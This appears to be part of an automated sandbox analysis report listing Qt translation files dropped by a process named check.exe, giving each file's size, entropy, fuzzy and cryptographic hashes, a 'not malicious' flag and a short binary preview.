                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB..3p...*..F....+.......@..!....@..Ef...A..!....A..E....B.."1...B..E....C.."U...C..E....D.."....D..F....E..#p...E..F)...F..#....F..FP...G..#....G..Fw...H..$....H..F....I..$6...I..F....P..&%...P..Gr...Q..&I...Q..G....R..&....R..G....S..&....S..H....T..&....T..H8...U..'....U..H_...V..'Z...V..H....W..'~...W..H....X..'....X..H....Y..'....Y..H....]..,....]..,....s.......t...9...............*...;.......;..+....;..1B...;......;..?x...;..N....;..iY...;..s3...M..,B...M..,....O.......O...w...O..rr...........}..,j...}..-....... 5...=.. ....m..,....m..-8...t.. .......ay..(5..TT..+;...A..+;..B...+;..u...+O......+O..=a..1...a...D@.."...E@..&m..E@..G...F...J...H4...=..HY..`...H.......I...J...IC......J....-..J.......J.......LD......L....(..PS.....QR.."S..R...e...T.... ..U......X.......Zr...g..[`......\......]x......_......._......._...v...yg......1...C....E..E...............=.......Q........................s...$..a....[.......,.......y.......y...y..............G..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):181387
                                                                                                                                                                                                            Entropy (8bit):4.755193800761075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                            MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                            SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                            SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                            SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB..4....*..h....+......@...f...A.......B.......C.......D...U...E.......F...v...G.......H.......I.......P.......Q.......R...6...S...Z...T...~...U.......V.......W..."...X...F...Y...j...]..+....s.......t..................-...;..+....;..,....;../....;..;....M..+....O.......O...r...........}..,............=...8...m..,0...t...c......T...(5..B...+;..NH..+;..~H..+O..,...1...UP..D@......E@......H4...E..HY..j...H.......IC...#..J....J..J.......J.......LD......L....1..PS...B..QR......R...o...T.......U.......X.......Zr......[`...W..\....}..]x...[.._....-.._.......yg...e..1...O....E..R....7..........-!......]............................$..k....[...7...,.......y...c...y.................j4...........9..l8...E..p............z...;..................%..a....D...~.............-.....L......OH.....Uz...5.......0.......0...U...0.......0..p....5...7...5..L$..............p... D..-... D..i...+....@..<U.....<U.....<....S..H5..-2..H5..j$..L....B..VE.. ...VE..P...V...*...f...e...f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):220467
                                                                                                                                                                                                            Entropy (8bit):4.626295310482312
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                            MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                            SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                            SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                            SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......de_DEB..7....*.......+..3....@..R....A..R....B..S....C..S@...D..S....E..T]...F..T....G..T....H..T....I..U#...P..W....Q..W6...R..W....S..W....T..W....U..W....V..XG...W..Xk...X..X....Y..X....]..2%...s..J$...t..9R......J.......B....;..1....;..3....;..q....;.......M..2O...O.......O..X@......ia...}..2y......Q....=..Q....m..2....t..Q...........(5......+;..ev..+;......+O..oh..1....4..D@..R...E@..WZ..H4..4...HY...[..H...AY..IC..>o..J...>...J.......J...>6..LD..@A..L...@...PS..I...QR..#...R....h..T...W...U...Xh..U....~..X...]...Zr..e(..[`..)...\...j...]x..O..._....K.._...lI..yg...U..1...f....E..i....7..........o.......wG......6.......6.......8....$...n...[..8....,..9....y.......y..=................3......>....9.......E..."......?_...z..#d.......0......A%...%..z....D..A.......B......KP......2.............^...5..B....0.......0..p....0..F....0...}...5..G....5..........H........... D..3}.. D...O..+...Q...<?..Ti..<U......<U..T...<...U)..H5..3...H5......L...X...VE..%j..V...l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165170
                                                                                                                                                                                                            Entropy (8bit):4.679910767547088
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                            MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                            SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                            SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                            SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB../....*..*,...+...y...@.......A.......B.......C.......D...v...E...=...F.......G.......H.......I.......P.......Q... ...R...k...S.......T.......U.......V...1...W...U...X...y...Y.......]..+....s.......t...................c...;..+....;..,....;...%...;..#....;..-....M..+....O.......O...............}..,............=...]...m..,/...t..........A...(5..3...+;..<...+;..o...+O..!b..1...Ap..D@......E@...D..H4...-..HY..[F..H.......IC...%..J....L..J.......J.......LD......L....O..PS......QR..!...R...`K..T.......U....&..X.......Zr.....[`...h..\......]x...|.._....Y.._....A..yg......1...=....E..?a......!.......K........G...............R...$..\Q...[.......,...z...y.......y..................+............9..\....E..2............z.. ....................%..ON...D........................:......=B.....A....5...7...0.......0......0.."....0...,...0..3....5...}...5...Y..............a... D..-!.. D..Z6..+....0..<U...h..<U......<.......H5..-M..H5..Z...L.......VE.."...VE..>...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179941
                                                                                                                                                                                                            Entropy (8bit):4.720938209922096
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                            MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                            SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                            SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                            SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fiB..38...*..ct...+......@.......A.......B.......C...@...D.......E...]...F.......G.......H.......I...#...P.......Q...6...R.......S.......T.......U.......V...G...W...k...X.......Y.......]..*....s...T...t.......................;..*....;..+....;..&....;..3....M..+!...O.......O...e...........}..+K...........=.......m..+w...t..........J...(5..9...+;..:y..+;..mW..+O..$...1...KY..D@......E@...Z..H4...l..HY..X&..H.......IC......J.......J...."..J......LD.....L.......PS...'..QR.. L..R...]...T.......U.......X.......Zr......[`......\.......]x......_....k.._....>..yg.. /..1...;....E..>....7..{(......%.......J........T.......&.......U...$..Y[...[......,...s...y.......y...a.......}......d...........9..Y....E..k'...........z...........V..........%..M....D...Q.......{......d.....A......E......K....5.......0.......0..&J...0.......0..k....5...*...5..I9.............._:.. D..,O.. D..W...+....9..<U...G..<U...*..<.......H5..,y..H5..W...H5......L....5..VE..!u..VE..E...V..."{..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):166167
                                                                                                                                                                                                            Entropy (8bit):4.685212271435657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                            MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                            SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                            SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                            SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB../....*..-....+.......@.......A.......B.......C...?...D.......E...\...F.......G.......H.......I..."...P.......Q...5...R.......S.......T.......U.......V...F...W...j...X.......Y.......]..+....s...=...t.......................;..+....;..,....;.......;..$b...;.......M..,....O.......O...5...........}..,3...........=.......m..,]...t..........A...(5..5j..+;..<T..+;..o...+O.."+..1...B\..D@......E@...Y..H4...8..HY..[{..H.......IC......J.......J.......J.......LD...|..L.......PS...?..QR..!...R...`j..T.......U....[..X.......Zr.....[`...)..\......]x......_....7.._.......yg...i..1...=Q...E..?@......"Y......K............................$..\....[...^...,...'...y.......y...+.......o....../c.......Y...9..\....E..6(...........z..!................j...%..OC...D...+.......[......a.....;......>......B....5.......0.......0...m...0..#....0.......0..6....5.......5..................a... D..-Y.. D..Ze..+....]..<U...;..<U......<.......H5..-...H5..Z...L.......VE.."...VE..?...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):189580
                                                                                                                                                                                                            Entropy (8bit):4.630160941635514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                            MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                            SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                            SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                            SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gd_GBB..2....*...u...+......@.......A...B...B.......C.......D.. ....E.. ....F..!&...G..!J...H..!n...I..!....P..#m...Q..#....R..#....S..$....T..$$...U..$H...V..$....W..$....X..$....Y..%....]../....s...'...t...................F...;.......;../....;..=V...;..G....M../G...O.......O...k......$....}../o.......i...=.......m../....t..........[...(5..M...+;..@...+;..x...+O..:...1...\7..D@...f..E@..#...H4...p..HY..be..H.......IC......J.......J....R..J.......LD......L.......PS......QR..#l..R...g...T.......U.......X....\..Zr......[`......\...&...]x......_....C.._...'t..yg..?...1...BM...E..D.......;.......R'.......t.......@.......?...$..c....[......,...i...y.......y...Y.......f.......+...........9..c....E...............z.."....................%..U....D..................G.....UB.....W......\]...5.......0.......0..<....0...;...0.......5.......5..ij..............h... D..0... D..aC..+....K..<U.....<U...~..<.......H5..0...H5..a...L....1..VE..$...VE..X...V...8|..f...Z...f...=..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):138690
                                                                                                                                                                                                            Entropy (8bit):5.515748942553918
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                            MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                            SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                            SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                            SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he_ILB../....*......+..Sw...@......A......B.......C.......D...X...E.......F.../...G...O...H...o...I......P.......Q.......R...I...S...i...T......U......V.......W.......X.../...Y...O...]..$....s......t..X:.......4......`Y...;..$....;..%....;.......;...5...;.......M..$....O...6...O..s............}..%-...........=...m...m..%k...t..........^..(5......+;..2...+;..^...+O...N..1.......D@......E@...(..H4..T...HY..L...H..._...IC..\...J...\...J.......J...\j..LD..^...L...^o..PS..fl..QR......R...Q...T...su..U...s...X...x3..Zr..~...[`..L\..\.......]x....._......._....o..yg...(..1...3....E..5C.......z......?V......U.......U.......W....$..M....[..W....,..X....y.......y..\........a..............\@...9..NO...E...?......]s...z...G.......(......^....%..B^...D.._......._.................... ..........5..`/...0.......0...L...0......0..d(...0......5..ek...5..........fB......R... D..&O.. D..K...+...l...<U......<U..p)..<...p...H5..&w..H5..La..L...s...VE......VE......V.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160494
                                                                                                                                                                                                            Entropy (8bit):4.831791320613137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                            MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                            SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                            SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                            SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB../....*.......+.......@.......A...0...B...{...C.......D.......E.......F.......G...<...H...`...I.......P...s...Q.......R.......S.......T...*...U...N...V.......W.......X.......Y.......]..+y...s.......t.......................;..+Q...;..,U...;.......;.......;..&....M..+....O.......O...U..........}..+............=.......m..+....t..........9c..(5..,...+;..;...+;..m7..+O......1...9...D@...T..E@......H4...v..HY..Y...H.......IC......J.......J.......J.......LD......L.......PS...}..QR..!...R...]...T.......U....{..X.......Zr...=..[`......\....*..]x...-.._......._......yg...M..1...<....E..>...............J........T.......(.......S...$..Z....[.......,...u...y.......y...[...............#...........9..Z....E..#&...........z..!'...................%..Mv...D..._....................32.....5......9....5.......0...h...0...E...0.......0.......0..#....5...Z...5...........G......_2.. D..,... D..W...+....W..<U......<U...B..<.......H5..,...H5..X{..L....)..VE.."...VE..6l..V....*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161172
                                                                                                                                                                                                            Entropy (8bit):4.680034416311688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                            MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                            SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                            SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                            SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB../....*.......+.......@.......A..."...B...m...C.......D.......E.......F.......G...0...H...T...I...x...P...q...Q.......R.......S.......T...(...U...L...V.......W.......X.......Y.......]..+....s...'...t...................^...;..+[...;..,g...;.......;.......;..!B...M..+....O...D...O...........(...}..+........I...=.......m..,....t..........4...(5..'...+;..<...+;..oV..+O......1...5...D@...F..E@......H4...J..HY..Z...H.......IC...L..J....s..J....j..J.......LD......L....f..PS......QR..!...R..._...T.......U....3..X.......Zr......[`...Q..\.......]x......_......._....0..yg...C..1...=....E..?o..............Kf.......h.......8.......I...$..[....[.......,...m...y...9...y...........z.......z...........9..\=...E..$u.......:...z.. k...................%..N....D..................M............0......5/...5...2...0.......0...0...0...A...0...)...0..$....5.......5...J.......a......a... D..,... D..Y...+.......<U......<U......<....v..H5..-...H5..Z...L.......VE.."c..VE..1...V....X.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):129911
                                                                                                                                                                                                            Entropy (8bit):5.802855391832282
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                            MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                            SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                            SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                            SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB../....*...'...+..=....@.......A.......B...?...C...c...D......E......F.......G.......H..."...I...F...P.......Q...'...R...r...S......T......U.......V...8...W...\...X......Y......].."k...s...Q...t..A...............I....;.."C...;..#A...;.......;.......;.......M.."....O...B...O..[?......h....}.."........m...=.......m.."....t...........M..(5......+;......+;..WU..+O......1.......D@......E@...K..H4..>=..HY..F...H...Hr..IC..E...J...F...J.......J...E...LD..Gz..L...G...PS..O...QR......R...K!..T...Z...U...[e..X..._f..Zr..e...[`..7...\...i...]x...'.._......._...j...yg..~+..1.../....E..1?.......#......:.......?.......?n......A....$..G....[..Ap...,..B....y.......y..Ew......|...............E....9..H....E..........F....z...]..............HL...%..=R...D..H.......I!......[......J......M..........5..It...0...3...0.......0...C...0..M....0...a...5..N....5..........N.......L6.. D..#... D..E...+...U%..<U......<U..X ..<...X...H5..#...H5..FK..L...[...VE......VE......V......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):156799
                                                                                                                                                                                                            Entropy (8bit):5.859529082176036
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                            MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                            SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                            SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                            SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB..7....*.......+.......@...K...A...o...B......C.......D...8...E.......F...U...G...y...H......I.......P......Q.......R.......S...C...T...g...U.......V.......W.......X...-...Y...Q...]..$....s...>...t...................y...;..${...;..%....;...u...;...l...M..$....O.......O...8...........}..$............=...C...m..%!...t...n..........(5...a..+;..E@..+;..l|..+O......1.......D@.....E@......H4......HY..\...H....]..IC......J.......J....8..J.......LD...a..L.......PS......QR......R...`...T.......U....^..U.......X....y..Zr......[`..y...\....A..]x......_......._....o..yg......1...FJ...E..HE...7..................Q........a.......5...........$..]....[...;...,.......y.......y...V...............!.......|...9..]....E...R...........z...4.......f.......5...%..Te...D..................D......^.............*...5...S...0.......0.......0.......0.......5.......5...........n......a... D..%... D..[...+.......<?......<U...;..<U...+..<.......H5..&...H5..\...L.......VE......V....A..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153608
                                                                                                                                                                                                            Entropy (8bit):4.843805801051326
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                            MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                            SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                            SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                            SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv_LVB.......*...B...+..y....@.......A...=...B......C......D.......E.......F...#...G...G...H...k...I.......P...~...Q......R.......S.......T...5...U...Y...V......W.......X.......Y.......]..%....s.......t...8.......n.......A...;..&....;.......;...!...;...A...;../....M..%....O.......O...............}..%...........=.......m..&....t...(......(g..(5...+..+;..4...+;..d...+O......1...(...D@...a..E@......H4..z...HY..Q...H.......IC......J....6..J.......J.......LD......L....9..PS......QR......R...U...T....S..U.......X...._..Zr......[`..r...\.......]x...*.._......._....{..yg......1...5v...E..7........(......B.......|.......|W......~r...$..R....[..~....,.......y...l...y...............................9..S....E...g...........z...z...................%..F....D........................"Z.....$......)....5.......0...\...0.......0...r...0.......0.......5...a...5..........J......V... D..&... D..P...+.......<U......<U......<.......H5..'"..H5..P...L....~..VE...R..VE..%...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162982
                                                                                                                                                                                                            Entropy (8bit):4.841899887077422
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                            MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                            SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                            SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
                                                                                                                                                                                                            SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl_PLB..0....*.."....+.......@...F...A...j...B......C.......D...3...E.......F...P...G...t...H.......I.......P.......Q.......R.......S...>...T...b...U.......V.......W.......X...(...Y...L...]..*....s.......t...r.......o.......+...;..*....;..+....;..."...;... ...M..*....O...6...O...........a...}..+...........=.......m..+G...t...G......,...(5......+;..:...+;..k...+O......1...-[..D@.....E@......H4...U..HY..WU..H.......IC......J....6..J.......J.......LD......L....%..PS......QR.. ...R...[...T....1..U.......X......Zr......[`......\.......]x...A.._......._....}..yg......1...;W...E..=........%......H....................$..Xp...[.......,.......y...i...y...........}......$R...........9..X....E..+)...........z.. E...................%..K....D...p....................&......(......-....5.......0.......0...e...0.......0..+....5...]...5...........f......]-.. D..,%.. D..V?..+....V..<U......<U......<....-..H5..,M..H5..V...L....Z..VE..!...VE..)...V.......f...P...f....K..f......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):203767
                                                                                                                                                                                                            Entropy (8bit):5.362551648909705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                            MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                            SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                            SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                            SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
